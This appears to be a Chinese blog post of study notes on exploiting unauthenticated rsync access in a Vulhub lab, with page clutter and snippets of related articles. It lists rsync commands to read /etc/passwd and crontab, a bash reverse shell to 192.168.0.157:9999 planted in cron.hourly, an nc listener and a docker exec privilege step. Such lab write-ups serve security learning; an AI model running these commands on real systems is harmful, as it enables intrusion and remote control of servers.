rsync未授权访问漏洞 之 学习笔记

最新推荐文章于 2024-08-05 18:57:21 发布
最新推荐文章于 2024-08-05 18:57:21 发布
阅读量506 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qlqlulu/article/details/113482211
版权
本文介绍了如何在Kali 2020中安装Docker,并利用Docker搭建Vulhub靶场进行漏洞利用实践。详细步骤包括:安装Docker,通过rsync命令读取、下载文件,反弹shell,以及本地提权。通过这种方式,读者可以学习到漏洞利用和安全测试的基本技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

kali2020安装docker搭建vulhua靶场
https://blog.youkuaiyun.com/u013536897/article/details/108543251
漏洞利用
连接

rsync rsync://127.0.0.1:873/

读取文件

rsync rsync://127.0.0.1:873/src/

下载文件
下载/etc/passwd
在这里插入图片描述任意文件下载
命令格式:rsync rsync://IP:port/src/etc/passwd 目标路径

rsync rsync://192.168.124.153:873/src/etc/passwd /tmp/tmp/

在这里插入图片描述反弹shell
下载crontab配置文件 rsync rsync://192.168.2.85:873/src/etc/crontab ./ 该环境crontab中

17 * * * * root cd / && run-parts --report /etc/cron.hourly

表示每小时的第17分钟执行run-parts --report /etc/cron.hourly
在这里插入图片描述创建一个文件输入shell脚本

#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.0.157/9999 0>&i

给它设置777权限
然后将它上传进去

rsync -av nc rsync://127.0.0.1:873/src/etc/cron.hourly

也可以使用这种上传rsync://192.168.2.85:873/src/var/spool/cron/crontabs/当前用户

在这里插入图片描述
最后使用kali监听本地接口

nc -lvnp 9999

在这里插入图片描述
静等第十七分钟运行我们上传的shell脚本
有个本地提权方法,但只适用本地靶场(本地)
查看docker容器

docker ps

提权

sudo docker exec -it a6cb5e784225 bash

在这里插入图片描述

漏洞挖掘】——92、Rsync未授权访问
Fly_鹏程万里
06-14 210
Rsync(Remote Sync)是一个用于文件和目录同步的开源工具,广泛用于Linux和Unix系统中,它通过比较源文件和目标文件的差异只传输变化的部分,实现高效的增量备份和文件同步,Rsync默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权就会触发隐患,Rsync的默认端口为837。
每日漏洞 | rsync未授权访问
03-12 4050
每日漏洞 | rsync未授权访问
rsync 未授权访问漏洞
weixin_30387663的博客
01-11 208
rsync rsync,remote synchronize顾名思意就知道它是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。 rsync是用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,而且可以通过ssh方式来传输文件,这样其保密性也非常好 rsync配置文件 配置文件 rsyncd.conf 由全局配置和若干模块配...
未授权访问Rsync 未授权访问漏洞
qq_68163788的博客
05-16 1450
Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。 Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
Linux运维学习笔记之十:SSH服务
放飞的心灵-记录学习的点点滴滴
12-02 3043
第十八章 SSH服务 一、SSH服务基础 1、简介 SSH 为 Secure Shell 的缩写,由 IETF 的网络工作小组(Network Working Group)所制定;SSH 为建立在应用层和传输层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个
操作系统学习笔记:结合习题答案,打造复习攻略与技能提升
[操作系统学习笔记:结合习题答案,打造复习攻略与技能提升](https://img.jbzj.com/file_images/article/202312/20231207090707016.png) 参考资源链接:[操作系统概念第七版:安全问题与资源管理解析]...
【网络安全】Web渗透测试攻防之浅述信息收集
anquan2233的博客
06-27 992
众所周知渗透测试的本质是信息收集,在渗透测试中信息收集的质量直接关系到渗透测试成果的与否。在对系统进行渗透测试前的信息收集是通过各种方式获取所需要的信息,收集的信息越多对目标进行渗透的优势越有利。通过利用获取到的信息对系统进行渗透。只有掌握了足够多的目标信息才能更好的对目标系统进行渗透。正所谓知彼知己百战不殆。
(最全干货分享)渗透测试全流程归纳总结之三
深入交流学习:webMsec
04-19 510
0x01 主动探测 从管理员和用户的角度了解整个WEB应用乃至整个目标的全貌,主动探测会暴露ip以及留下日志信息,所以要… 1.主动扫描 1.1常见服务漏洞 nmap的功能:     脚本扫描,隐蔽扫描,端口扫描,服务识别,OS识别,探测WAF   nmap脚本主要分为以下几类,在扫描时可根据需要设置   --script=类别这种方式进行比较笼统的扫描: auth: 负责处理鉴权证书(绕开鉴权)的脚本     broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服
Rsync未授权访问漏洞 *
最新发布
starhei.zxy的博客
08-05 604
是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为。中搜索该资产语法如下并在Vulhub中开启靶场!且默认配置文件路径在。
rsync未授权访问漏洞利用
weixin_47493074的博客
10-05 822
rsync未授权访问漏洞利用
Rsync未授权访问
浅笑996的博客
11-19 5306
1.漏洞名称 Rsync 未授权访问漏洞 2.漏洞原理 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或 访问密码,我们将可以读写目标服务器文件。 3.漏洞利用 vulhub环境靶机 : 192.168.91.130 攻击机:kali 192.168.91.128...
Rsync未授权访问 getshell——漏洞复现
W小哥
11-09 3964
一、 Rsync未授权访问漏洞介绍 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 二、靶场搭建 靶机: ubuntu IP: 192.168.241.142 攻击机: kali IP: 192.168.241.128 直接使用 vluhub 环境了 cd rsync/common docker-compose build docke
网络中未授权访问漏洞Rsync,PhpInfo)
weixin_45840241的博客
07-03 1241
Rsync未授权访问漏洞是指Rsync服务配置不当或存在漏洞,导致攻击者可以未经授权访问和操作Rsync服务。Rsync是一个用于文件同步和传输的开源工具,通常在Unix/Linux系统上使用。当Rsync服务未经正确配置时,攻击者可以利用该漏洞获取敏感文件、执行恶意操作,甚至对系统进行破坏。这种漏洞通常出现在以下情况下。
rsync未授权访问漏洞
weixin_46431197的博客
07-12 394
文章目录rsync未授权访问漏洞一、简介二、常用技巧0x000x01三、自动化脚本 rsync未授权访问漏洞 一、简介 rsync是Unix下的一款应用软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。 二、常用技巧 0x00 rsync默认配置文件为/etc/rsyncd.conf,常驻模式启动命令rsync
常见IT系统未授权漏洞风险与Redis示例
本文主要探讨了多个常见的未授权访问漏洞,涉及的IT服务和组件包括Redis、MongoDB、Jenkins、Memcached、JBOSS、VNC、Docker、ZooKeeper、Rsync、Atlassian Crowd、CouchDB、Elasticsearch和Hadoop。这些漏洞的共同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值